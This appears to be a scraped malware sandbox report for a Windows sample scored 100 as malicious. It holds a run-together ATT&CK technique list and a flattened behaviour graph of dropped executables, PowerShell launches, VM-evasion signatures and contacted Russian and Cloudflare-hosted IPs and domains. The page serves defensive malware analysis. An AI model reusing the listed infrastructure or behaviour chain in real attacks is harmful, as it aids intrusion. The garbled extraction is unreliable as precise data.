                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Access Token Manipulation                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt512
                    Process Injection                    		/etc/passwd and /etc/shadow3
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Bootkit                    		Network Sniffing1
                    System Network Configuration Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1665555 Sample: nK8noQeiXl.exe Startdate: 15/04/2025 Architecture: WINDOWS Score: 100 106 quag.cn 2->106 108 yahoo.com 2->108 110 4 other IPs or domains 2->110 134 Found malware configuration 2->134 136 Malicious sample detected (through community Yara rule) 2->136 138 Antivirus detection for dropped file 2->138 140 15 other signatures 2->140 14 nK8noQeiXl.exe 1 2->14         started        18 regsvr32.exe 2->18         started        signatures3 process4 file5 104 C:\Users\user\AppData\...\svchost015.exe, PE32 14->104 dropped 154 Detected unpacking (creates a PE file in dynamic memory) 14->154 156 Writes to foreign memory regions 14->156 158 Allocates memory in foreign processes 14->158 160 2 other signatures 14->160 20 svchost015.exe 25 14->20         started        signatures6 process7 dnsIp8 112 185.156.73.98, 49692, 49695, 49696 RELDAS-NETRU Russian Federation 20->112 76 C:\Users\user\AppData\...\DrjfIAN86u.exe, PE32 20->76 dropped 78 C:\Users\user\AppData\...\vn6ZAuKJ8m7U3.exe, PE32 20->78 dropped 80 C:\Users\user\AppData\...\Qv4wdsLMG.exe, PE32 20->80 dropped 82 3 other malicious files 20->82 dropped 24 DrjfIAN86u.exe 2 20->24         started        27 Qv4wdsLMG.exe 2 20->27         started        30 vn6ZAuKJ8m7U3.exe 20->30         started        file9 process10 dnsIp11 90 C:\Users\user\AppData\...\DrjfIAN86u.tmp, PE32 24->90 dropped 33 DrjfIAN86u.tmp 18 20 24->33         started        92 C:\Users\user\AppData\Local\...\Qv4wdsLMG.tmp, PE32 27->92 dropped 144 Multi AV Scanner detection for dropped file 27->144 36 Qv4wdsLMG.tmp 3 5 27->36         started        118 proenhann.digital 104.21.40.117 CLOUDFLARENETUS United States 30->118 120 h1.passionwhenever.shop 104.21.53.21 CLOUDFLARENETUS United States 30->120 94 C:\Users\...\5I0ZLKZO7SYLHSOPSEU02A6S8PA.exe, HTML 30->94 dropped 146 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 30->146 148 Query firmware table information (likely to detect VMs) 30->148 150 Creates HTML files with .exe extension (expired dropper behavior) 30->150 152 3 other signatures 30->152 file12 signatures13 process14 file15 64 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 33->64 dropped 66 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 33->66 dropped 68 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 33->68 dropped 74 22 other malicious files 33->74 dropped 38 ntfs2fat32converter102.exe 1 19 33->38         started        70 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 36->70 dropped 72 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 36->72 dropped 42 Qv4wdsLMG.exe 2 36->42         started        process16 dnsIp17 114 185.39.17.76 RU-TAGNET-ASRU Russian Federation 38->114 116 62.210.201.223 OnlineSASFR France 38->116 84 C:\ProgramData\...\sqlite3.dll, PE32 38->84 dropped 86 C:\ProgramData\...86TFS2FAT32Converter.exe, PE32 38->86 dropped 88 C:\Users\user\AppData\Local\...\Qv4wdsLMG.tmp, PE32 42->88 dropped 44 Qv4wdsLMG.tmp 19 7 42->44         started        file18 process19 file20 96 C:\Users\user\AppData\...\user32_8.drv (copy), PE32 44->96 dropped 98 C:\Users\user\AppData\Roaming\is-4R09J.tmp, PE32 44->98 dropped 100 C:\Users\user\AppData\...\unins000.exe (copy), PE32 44->100 dropped 102 3 other malicious files 44->102 dropped 47 regsvr32.exe 44->47         started        process21 dnsIp22 122 quag.cn 194.87.98.18 MTW-ASRU Russian Federation 47->122 124 mta5.am0.yahoodns.net 67.195.204.77 YAHOO-3US United States 47->124 126 microsoft-com.mail.protection.outlook.com 52.101.41.22 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 47->126 128 System process connects to network (likely due to code injection or exploit) 47->128 130 Suspicious powershell command line found 47->130 132 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 47->132 51 powershell.exe 47->51         started        54 powershell.exe 47->54         started        56 powershell.exe 47->56         started        signatures23 process24 signatures25 142 Loading BitLocker PowerShell Module 51->142 58 conhost.exe 51->58         started        60 conhost.exe 54->60         started        62 conhost.exe 56->62         started        process26

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.